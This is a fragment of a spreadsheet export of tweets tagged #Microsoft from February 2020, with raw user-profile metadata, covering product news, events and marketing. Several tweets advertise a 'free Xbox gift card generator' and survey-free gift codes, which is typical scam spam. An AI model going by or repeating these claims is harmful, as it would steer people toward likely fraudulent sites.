    <t>Dear community, i have seen an official Microsoft technical document, what data is stored all inside the office 365 user mailbox. Like Teams 1:1 chat,... Do you have a link for me to this document? Thanks @all best Sascha
#Microsoft #Office365 #MSTeams #MVPBuzz #modernworkplace</t>
  </si>
  <si>
    <t>Fri Feb 28 15:42:13 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Role-based Certification Options #recommended #microsoft #learning #certifications #learningpath #a #devops #cloud https://t.co/jTkrd8QXMG</t>
  </si>
  <si>
    <t>Fri Feb 28 15:41:05 +0000 2020</t>
  </si>
  <si>
    <t>Join us LIVE today at 1:30 PM EST for our Five Minute Friday Episode: @MSPowerBI Quick Start. Ali Aljishi, our Software Developer, will be answering all your questions!
https://t.co/FBaKomxm4N
#PowerBI #Microsoft #Data https://t.co/I0GKDjKLLI</t>
  </si>
  <si>
    <t>{'id': 1926909836, 'id_str': '1926909836', 'name': 'Red Level', 'screen_name': 'RedLevelIT', 'location': 'Novi, MI and Grand Rapids, MI', 'description': 'From headache-free managed IT services to custom application development, Red Level helps Michigan-based businesses transform tech into a competitive advantage.', 'url': 'https://t.co/nEN9guwEcR', 'entities': {'url': {'urls': [{'url': 'https://t.co/nEN9guwEcR', 'expanded_url': 'http://RedLevelGroup.com', 'display_url': 'RedLevelGroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 607, 'friends_count': 2531, 'listed_count': 36, 'created_at': 'Wed Oct 02 13:38:38 +0000 2013', 'favourites_count': 464, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2411,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'http://pbs.twimg.com/profile_images/1214290001124573191/O2s9CAgI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214290001124573191/O2s9CAgI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1926909836/1578344320',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</si>
  <si>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15:39:47 +0000 2020</t>
  </si>
  <si>
    <t>Man who worked for #Microsoft for two years #stole #millions of dollars from their online retail space https://t.co/zf24Ce5bk2 #criminaldefenseattorney</t>
  </si>
  <si>
    <t>{'id': 1534297663, 'id_str': '1534297663', 'name': 'Dorienne Kriegstein', 'screen_name': 'DorienneK', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 104, 'friends_count': 521, 'listed_count': 3, 'created_at': 'Thu Jun 20 15:57:00 +0000 2013', 'favourites_count': 697, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6686,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'http://pbs.twimg.com/profile_images/1039256499510489088/NBgahzmg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1039256499510489088/NBgahzmg_normal.jpg',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</si>
  <si>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15:39:44 +0000 2020</t>
  </si>
  <si>
    <t>Worried about the Leap year bug? - #azure #microsoft says to watch out. https://t.co/9ecxmiTys8</t>
  </si>
  <si>
    <t>{'id': 46121518, 'id_str': '46121518', 'name': 'Digital Craftsmen', 'screen_name': 'DCHQ', 'location': 'London, United Kingdom', 'description': 'Experts in cloud managed services &amp; hosting critical systems  info@digitalcraftsmen.com #ISO27001 #CyberEssentials Plus #AWS #Azure #GoogleCloud  #security', 'url': 'https://t.co/kxfXR8vysJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/kxfXR8vysJ', 'expanded_url': 'http://www.digitalcraftsmen.com/', 'display_url': 'digitalcraftsmen.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1337, 'friends_count': 1630, 'listed_count': 75, 'created_at': 'Wed Jun 10 14:18:43 +0000 2009', 'favourites_count': 518, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1440,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'http://pbs.twimg.com/profile_images/1563892930/DC_Logo_Mark_RGB-500x500_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1563892930/DC_Logo_Mark_RGB-500x500_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/46121518/1521544508',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</si>
  <si>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15:39:35 +0000 2020</t>
  </si>
  <si>
    <t>Why is our EMEA team so pumped up right now.......? @eXtreme_365 will be in Barcelona this March and we are looking forward to participation and meeting many partners and customers we can work with ! 
https://t.co/DyVh6Obc88
#eXtreme365 #Microsoft #Msdyn365 #Solgari #ISV</t>
  </si>
  <si>
    <t>Fri Feb 28 15:39:31 +0000 2020</t>
  </si>
  <si>
    <t>Windows VPS Hosting - Your virtual server in the cloud 
https://t.co/t5n0ABPx6x
#microsoftwindows #windows #server #server2019 #microsoft #windowsserver #azure #cloud #vps #virtual #linux #website #hosting #vpn #proxy #gaming #desktop #remotedesktop #rdp #microsoftstudios https://t.co/hQMqNrO1M2</t>
  </si>
  <si>
    <t>{'id': 467388941, 'id_str': '467388941', 'name': 'QuickHostUK', 'screen_name': 'QuickHostUK', 'location': 'London, England', 'description': "Fully Managed Web Hosting. From digital agencies, design firms, freelance web designers, business website owners &amp; individuals - We've got you covered ðŸ‘", 'url': 'http://t.co/HWmETVxHM2', 'entities': {'url': {'urls': [{'url': 'http://t.co/HWmETVxHM2', 'expanded_url': 'http://www.quickhostuk.com', 'display_url': 'quickhostuk.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 763, 'friends_count': 1841, 'listed_count': 33, 'created_at': 'Wed Jan 18 12:20:41 +0000 2012', 'favourites_count': 386, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2840,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'http://pbs.twimg.com/profile_images/1081654242149052418/3qlIiQMk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081654242149052418/3qlIiQMk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/467388941/1568731188',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</si>
  <si>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15:37:19 +0000 2020</t>
  </si>
  <si>
    <t>Free Xbox Gift Card Generator is an online tool that makes you generate free xbox gift codes. Get free xbox gift card codes without surveys.https://t.co/N99qUQFET0https://t.co/oheqYoFV3E #Xbox #XboxGamePassUltimate #freegame #XboxLive #Microsoft #EEUU #GiftCard https://t.co/uXxU2d3BlY</t>
  </si>
  <si>
    <t>Fri Feb 28 15:35:12 +0000 2020</t>
  </si>
  <si>
    <t>Windows Server and SQL Server Certifications are Gone https://t.co/UZwyhJTYgB #Microsoft #Azure</t>
  </si>
  <si>
    <t>Fri Feb 28 15:35:08 +0000 2020</t>
  </si>
  <si>
    <t>How to prevent #scripting attacks in #Microsoft #Office | via @CSOonline  https://t.co/OYCdXFUldi #phishing</t>
  </si>
  <si>
    <t>Fri Feb 28 15:34:04 +0000 2020</t>
  </si>
  <si>
    <t>Strangest message when logging into Windows this morning in the office. What the hell does this mean? #Microsoft #Windows10 https://t.co/t45nmpJOW1</t>
  </si>
  <si>
    <t>{'id': 79857864, 'id_str': '79857864', 'name': 'TDCatTech', 'screen_name': 'tdcatuk', 'location': 'Bristol, United Kingdom', 'description': 'Tech Reviews and Tutorials', 'url': 'https://t.co/bvcgUq747G', 'entities': {'url': {'urls': [{'url': 'https://t.co/bvcgUq747G', 'expanded_url': 'http://tdcat.com', 'display_url': 'tdcat.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 113, 'friends_count': 101, 'listed_count': 16, 'created_at': 'Sun Oct 04 23:23:48 +0000 2009', 'favourites_count': 121, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1503, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '455666', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1059454593367719937/aQrTQcZW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1059454593367719937/aQrTQcZW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/79857864/1520875237', 'profile_link_color': '30C5D5',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</si>
  <si>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15:32:59 +0000 2020</t>
  </si>
  <si>
    <t>Stay connected, even when youre not!
#Microsoft #microsoftteams #teams #chat #collaborate #office #office365 #microsoftoffice #remote #work #workremote https://t.co/zaLthnvaVR</t>
  </si>
  <si>
    <t>Fri Feb 28 15:31:39 +0000 2020</t>
  </si>
  <si>
    <t>Xbox gift cards are essential for any gamer, but the cost of them adds up fast. Fortunately, there are many ways to get free Xbox gift cards.https://t.co/paBfYxgEKchttps://t.co/RvbjpgPFHU #Xbox #XboxSeriesX #XboxGamePass #freegame #GiftCard #Microsoft https://t.co/7Qu41DT4zW</t>
  </si>
  <si>
    <t>Fri Feb 28 15:30:49 +0000 2020</t>
  </si>
  <si>
    <t>When the time came for the University of Arizona to consolidate their multiple Active Directory domains and modernize their internal network, CatNet, they trusted #Microsoft for a smooth transition and a focus on security. https://t.co/3wA4DgvIWi https://t.co/W4nYZ0qPQe</t>
  </si>
  <si>
    <t>{'id': 988460348637245440, 'id_str': '988460348637245440', 'name': 'LANSolutions LLC', 'screen_name': 'LANSolutionsMSP', 'location': 'San Diego', 'description': 'Strategic Managed Services for businesses in San Diego, Orange County and Hawaii!', 'url': 'https://t.co/qSHknYODv5', 'entities': {'url': {'urls': [{'url': 'https://t.co/qSHknYODv5', 'expanded_url': 'http://www.lansolutions.net/', 'display_url': 'lansolutions.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 114, 'listed_count': 1, 'created_at': 'Mon Apr 23 16:51:26 +0000 2018', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 464,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'http://pbs.twimg.com/profile_images/989422177869905920/MmP02Pwx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/989422177869905920/MmP02Pwx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/988460348637245440/1524731690',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</si>
  <si>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15:30:40 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Business? Business Premium? E3 or E5? Which #Office365 package is right for my law firm? @bschorr #microsoft  https://t.co/OEaUYBTTwC https://t.co/BvRM9I04rW</t>
  </si>
  <si>
    <t>{'id': 177692740, 'id_str': '177692740', 'name': 'Attorney at Work', 'screen_name': 'attnyatwork', 'location': '', 'description': 'Attorney at Work delivers one really good idea every day to help enterprising lawyers create the career and life they can love. Subscribe for free!', 'url': 'http://t.co/2VEIVKyTzm', 'entities': {'url': {'urls': [{'url': 'http://t.co/2VEIVKyTzm', 'expanded_url': 'http://www.attorneyatwork.com', 'display_url': 'attorneyatwork.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17037, 'friends_count': 2090, 'listed_count': 455, 'created_at': 'Thu Aug 12 20:47:42 +0000 2010', 'favourites_count': 7266, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 19569, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FBAD17', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/479396340040871936/imGb96Gv_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/479396340040871936/imGb96Gv_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/177692740/1496328197', 'profile_link_color': 'B30000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'CFCFCF', 'profile_text_color': '636363', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 15:30:32 +0000 2020</t>
  </si>
  <si>
    <t>We are working with a Latin American based firm looking to expand into the US by acquiring a #customapplication developer with a focus on #Microsoft, analytics, and financial services. If youre considering an exit of your business, lets talk: info@revenuerocket.com https://t.co/qxxNIRXj65</t>
  </si>
  <si>
    <t>Fri Feb 28 15:30:27 +0000 2020</t>
  </si>
  <si>
    <t>How To View Photos As A Slideshow On Windows 10.
https://t.co/CmF8rAErVV
#Systweak #HowTo #Windows10 #Photos #Microsoft</t>
  </si>
  <si>
    <t>{'id': 63092088, 'id_str': '63092088', 'name': 'Systweak Software', 'screen_name': 'systweak', 'location': 'India', 'description': 'With our top-notch utilities &amp; content, we try to help users with the daily technology they use. Follow @systweak to stay updated on latest tech trends!', 'url': 'http://t.co/JAKFlUZU2s', 'entities': {'url': {'urls': [{'url': 'http://t.co/JAKFlUZU2s', 'expanded_url': 'http://www.systweak.com', 'display_url': 'systweak.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1215, 'friends_count': 880, 'listed_count': 257, 'created_at': 'Wed Aug 05 10:09:37 +0000 2009', 'favourites_count': 456, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6443,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'http://pbs.twimg.com/profile_images/950990087998746624/XzVDunk-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/950990087998746624/XzVDunk-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/63092088/1573476052', 'profile_link_color': '7FDBB6',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</si>
  <si>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15:28:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Browsers Microsoft Updates Edge Browser to Protect Against Illicit Crypto Miners https://t.co/zELSfsHZ5W  | https://t.co/3JvnwYQBoJ https://t.co/jH8PvuAO72</t>
  </si>
  <si>
    <t>Fri Feb 28 15:27:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Updates Edge Browser to Protect Against Illicit Crypto Miners: Later versions of Edge can now be set to block downloads of malicious mining apps. https://t.co/dOyoFqXY7y #Tech #Business #Microsoft https://t.co/qMFHzBL4ST</t>
  </si>
  <si>
    <t>{'id': 288638912, 'id_str': '288638912', 'name': 'à¸¿ittrail', 'screen_name': '___CryptoNews', 'location': 'United Arab Emirates', 'description': 'Crypto news as it happens. #bitcoin #crypto #blockchain #decentralized #cryptotrader', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2166, 'friends_count': 2165, 'listed_count': 82, 'created_at': 'Wed Apr 27 06:25:55 +0000 2011', 'favourites_count': 280, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 266489,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'http://pbs.twimg.com/profile_images/1060780808301101056/7PsWzgKa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1060780808301101056/7PsWzgKa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/288638912/1582839789', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'F5F3DC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>#Tech #Business #Microsoft #Browsers #Cryptominers Microsoft Updates Edge Browser to Protect Against Illicit Crypto Miners https://t.co/9xwMKfiUrI https://t.co/bZSBMXKQM9</t>
  </si>
  <si>
    <t>{'id': 780792121431199745, 'id_str': '780792121431199745', 'name': 'European Chamber of Digital Commerce', 'screen_name': 'Juchtervbergen', 'location': 'Schiphol-Rijk, Haarlemmermeer', 'description': 'The European Chamber of Digital Commerce is your hub for the top developments in Digitalization and Fintech.\n\nR.A.U. Juchter van Bergen Quast, CEO', 'url': 'https://t.co/PPryFw7i8N', 'entities': {'url': {'urls': [{'url': 'https://t.co/PPryFw7i8N', 'expanded_url': 'http://www.europeanchamberofdigitalcommerce.com', 'display_url': 'europeanchamberofdigitalcommerce.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2124, 'friends_count': 154, 'listed_count': 14, 'created_at': 'Tue Sep 27 15:32:02 +0000 2016', 'favourites_count': 1415, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 42067,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'http://pbs.twimg.com/profile_images/1118111458812944384/F4TT4I6m_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118111458812944384/F4TT4I6m_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/780792121431199745/1559661574',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</si>
  <si>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15:27:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Updates Edge Browser to Protect Against Illicit Crypto Miners: Later versions of Edge can now be set to block downloads of malicious mining apps. https://t.co/C4eLsE3jCe #Tech #Business #Microsoft https://t.co/JNCbrFpI4a</t>
  </si>
  <si>
    <t>Microsoft Updates Edge Browser to Protect Against Illicit Crypto Miners https://t.co/SIxAhhKhqv #Tech #Business #Microsoft #Browsers #Cryptominers</t>
  </si>
  <si>
    <t>Fri Feb 28 15:27:03 +0000 2020</t>
  </si>
  <si>
    <t>With malicious cryptocurrency #Miners having proliferated over the internet in the last two years, #Microsoft has moved to #Protect users of its #Edge web #Browser from the effects of the malicious software.
In a blog ...
 #Browsers #Cryptominers
https://t.co/BEEFwQJwwF https://t.co/9pEVzMYKCz</t>
  </si>
  <si>
    <t>{'id': 169137367, 'id_str': '169137367', 'name': 'ðŸ’¥ðŸ’¥ðŸ’¥ðŸ’¥ðŸ’¥ðŸ”­ðŸ¤–â“µâ’·â“Šâ“‹ðŸŒŽðŸ“¡ðŸ’¥ðŸ’¥ðŸ’¥ðŸ’¥ðŸ’¥', 'screen_name': '_1BUV', 'location': ' ðŸŒŽ â¤ï¸ï¸ à¹€t à¹Ð³ lÑ”à¸„×©Ñ” à¹€t ðŸ’«ðŸ‘½', 'description': '24/7 ðŸ…†ðŸ„¾ðŸ…ðŸ„»ðŸ„³ ðŸ„½ðŸ„´ðŸ…†ðŸ…‚ ðŸ”Š   #Corruption #Coverups #Dogmas #Eco #Energy #Money #Politics #Protests  #Space #Time #War #WFB', 'url': 'https://t.co/vc8Vg64Cb9', 'entities': {'url': {'urls': [{'url': 'https://t.co/vc8Vg64Cb9', 'expanded_url': 'http://1BUV.COM', 'display_url': '1BUV.COM', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3108, 'friends_count': 3251, 'listed_count': 17, 'created_at': 'Wed Jul 21 16:51:57 +0000 2010', 'favourites_count': 2602, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 41516, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '050500', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1210991006/radarSmCLR_normal.gif', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210991006/radarSmCLR_normal.gif', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/169137367/1582222690', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': 'F23B03', 'profile_sidebar_fill_color': '050400', 'profile_text_color': 'F7140D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 15:25:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft DoWhy is an Open Source Framework for Causal Reasoning. https://t.co/d1yJLGLv2V #AI https://t.co/HAIln05jPP</t>
  </si>
  <si>
    <t>{'id': 95575650, 'id_str': '95575650', 'name': 'Fr. Vanâˆ‚erseypen', 'screen_name': 'TheOrbifold', 'location': 'Belgium', 'description': 'Data scientist (freelance).', 'url': 'https://t.co/tbHS0KVHGP', 'entities': {'url': {'urls': [{'url': 'https://t.co/tbHS0KVHGP', 'expanded_url': 'http://www.orbifold.net', 'display_url': 'orbifold.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 738, 'friends_count': 58, 'listed_count': 270, 'created_at': 'Wed Dec 09 04:27:09 +0000 2009', 'favourites_count': 62, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5137,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'http://pbs.twimg.com/profile_images/946652279578480640/a8URWFOk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/946652279578480640/a8URWFOk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/95575650/1478269273', 'profile_link_color': '4A913C', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '666666', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 15:20:41 +0000 2020</t>
  </si>
  <si>
    <t>Find out how to get free Xbox gift cards. Making free money is definitely an advantage.https://t.co/WhNmEWdIDohttps://t.co/clw9ud3iD7 #Xbox #XboxSeriesX #XboxGamePass #XboxLive #Microsoft #GiftCard #freegame #EEUU #xboxcodes https://t.co/WowtpQywJj</t>
  </si>
  <si>
    <t>Fri Feb 28 15:20:02 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 15:18:59 +0000 2020</t>
  </si>
  <si>
    <t>Why Open Platforms Offer More Business Advantages | Gravity Software https://t.co/FU990QVvPQ by @GoGravityOnline
#ERPNews #Tech #Innovation #Microsoft #CRM #PowerBI #RealTimeInsights #Purchasing #Automation #MsDynCRM #OnlineBiz #Distributor #Controllers #CFOs #QuickBooks https://t.co/9uMhRAUzgj</t>
  </si>
  <si>
    <t>Fri Feb 28 15:17:01 +0000 2020</t>
  </si>
  <si>
    <t>Google says Microsoft Edge isn't secure. I asked Google why https://t.co/21UiyWpjbt #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 15:16:56 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Updates Edge Browser to Protect Against Illicit Crypto Miners - CoinDesk #Microsoft #Browsers #Cryptominers #Edge @coindesk https://t.co/IiAWUY3uoo https://t.co/ciG5xjFbwu</t>
  </si>
  <si>
    <t>{'id': 2281314234, 'id_str': '2281314234', 'name': 'BitcoinAgile', 'screen_name': 'bitcoinagile', 'location': "Matter Doesn't Matter", 'description': 'Breaking News. Bitcoin, Blockchain &amp; Beyond. #bitcoin #blockchain #ethereum #cryptocurrency #crypto #trading #TA #charts $btc $eth', 'url': 'https://t.co/0PAI4x0LoK', 'entities': {'url': {'urls': [{'url': 'https://t.co/0PAI4x0LoK', 'expanded_url': 'http://bitcoinagile.com', 'display_url': 'bitcoinagile.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52314, 'friends_count': 13144, 'listed_count': 7218, 'created_at': 'Tue Jan 07 23:52:46 +0000 2014', 'favourites_count': 2924, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 956083,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'http://pbs.twimg.com/profile_images/902617531109617665/-5e-1IJw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/902617531109617665/-5e-1IJw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2281314234/1422172470', 'profile_link_color': 'E66A3F',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</si>
  <si>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Feb 28 15:14:28 +0000 2020</t>
  </si>
  <si>
    <t>Talking Tech with Microsoft CEO Satya Nadella! https://t.co/QghciH2URi via @YouTube #Microsoft</t>
  </si>
  <si>
    <t>{'id': 120669066, 'id_str': '120669066', 'name': 'Wahid Ibrahimy', 'screen_name': 'wibrahimy', 'location': 'United States', 'description': 'Former Senior Software Engineer  @SempraEnergy, Senior Web Developer @StateDept, Data Management Officer @WFP', 'url': 'https://t.co/fi25MOmjl6', 'entities': {'url': {'urls': [{'url': 'https://t.co/fi25MOmjl6', 'expanded_url': 'http://wahidibrahimy.com', 'display_url': 'wahidibrahimy.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 424, 'listed_count': 2, 'created_at': 'Sun Mar 07 05:08:37 +0000 2010', 'favourites_count': 256, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 286,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'http://pbs.twimg.com/profile_images/1289870928/49951_100000425313098_5819995_n_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1289870928/49951_100000425313098_5819995_n_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/120669066/1570884210',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</si>
  <si>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15:13:24 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 15:12:14 +0000 2020</t>
  </si>
  <si>
    <t>Take a look at #Microsoft set to headline #Worcestershire #event on the Business &amp;amp; Innovation Magazine website https://t.co/txnEORrsw2</t>
  </si>
  <si>
    <t>{'id': 564982956, 'id_str': '564982956', 'name': 'Rosemary Henderson', 'screen_name': 'RosieLovesBiz', 'location': 'Worcestershire &amp; Warwickshire', 'description': 'Business &amp; Innovation Magazine - \nN K Media\nrosemary.henderson@nkmedia.co.uk', 'url': 'https://t.co/vtZZlOP6Fu', 'entities': {'url': {'urls': [{'url': 'https://t.co/vtZZlOP6Fu', 'expanded_url': 'http://www.businessinnovationmag.co.uk', 'display_url': 'businessinnovationmag.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2340, 'friends_count': 5001, 'listed_count': 36, 'created_at': 'Fri Apr 27 20:40:18 +0000 2012', 'favourites_count': 3117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4917,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'http://pbs.twimg.com/profile_images/1197166697695862784/c44mkhek_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197166697695862784/c44mkhek_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/564982956/1525088832',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</si>
  <si>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15:12:07 +0000 2020</t>
  </si>
  <si>
    <t>Online methods to get free Xbox gift card codes. No survey required! 100% free.https://t.co/2DrKcQcEfuhttps://t.co/ElEQ9afNm5 #Xbox #XboxGamePass #Microsoft #GiftCards #EEUU #freegame #XboxLive #XboxSeriesX #codegenerator https://t.co/qD00xsY9Rv</t>
  </si>
  <si>
    <t>Fri Feb 28 15:11:15 +0000 2020</t>
  </si>
  <si>
    <t>Student Loans Company to enlist IT suppliers for 200m transformation plan https://t.co/mQ9730rwKr via @Hybrid_Circle #VMware #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 15:10:08 +0000 2020</t>
  </si>
  <si>
    <t>Google says Microsoft Edge isn't secure. I asked Google why https://t.co/259oZEGbEz #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 15:09:23 +0000 2020</t>
  </si>
  <si>
    <t>Looking to attend @SPConf 2020 in Vegas this spring? Use our sponsor discount code to save $50 on your registration - we look forward to seeing you there! #SPC20 #contentservices #microsoft #mspartner https://t.co/7uaOkPqLws</t>
  </si>
  <si>
    <t>Fri Feb 28 15:08:56 +0000 2020</t>
  </si>
  <si>
    <t>Will be teaching #microsoft #office #word and #Excel to a customer in Tarpon Springs this morning. #computerlessons @ Tarpon Springs, Florida https://t.co/SZB2exPTd3</t>
  </si>
  <si>
    <t>{'id': 20590200, 'id_str': '20590200', 'name': 'Daniel Rivera', 'screen_name': 'dancompassist70', 'location': 'Tampa, FL', 'description': '', 'url': 'https://t.co/UCIeR9ALxd', 'entities': {'url': {'urls': [{'url': 'https://t.co/UCIeR9ALxd', 'expanded_url': 'https://danielscomputertut.wixsite.com/danscomptutor', 'display_url': 'danielscomputertut.wixsite.com/danscomptutor', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 89, 'listed_count': 1, 'created_at': 'Wed Feb 11 13:39:21 +0000 2009', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 600,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'http://pbs.twimg.com/profile_images/1199844410021892096/ox34luMr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199844410021892096/ox34luMr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20590200/1574900175',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</si>
  <si>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15:07:04 +0000 2020</t>
  </si>
  <si>
    <t>Help IT professionals get work done faster!
Read our popular book: https://t.co/IqibXPCGlC 
#microsoft  #PHIBooks #microsoftpress https://t.co/ckBbChltZZ</t>
  </si>
  <si>
    <t>Fri Feb 28 15:05:52 +0000 2020</t>
  </si>
  <si>
    <t>Trying to decide between #Cisco and #Microsoft for your #collaboration needs? Let us help! #WhiteboardFridays https://t.co/vIM9xEBwhQ https://t.co/RF0Ntb7pNr</t>
  </si>
  <si>
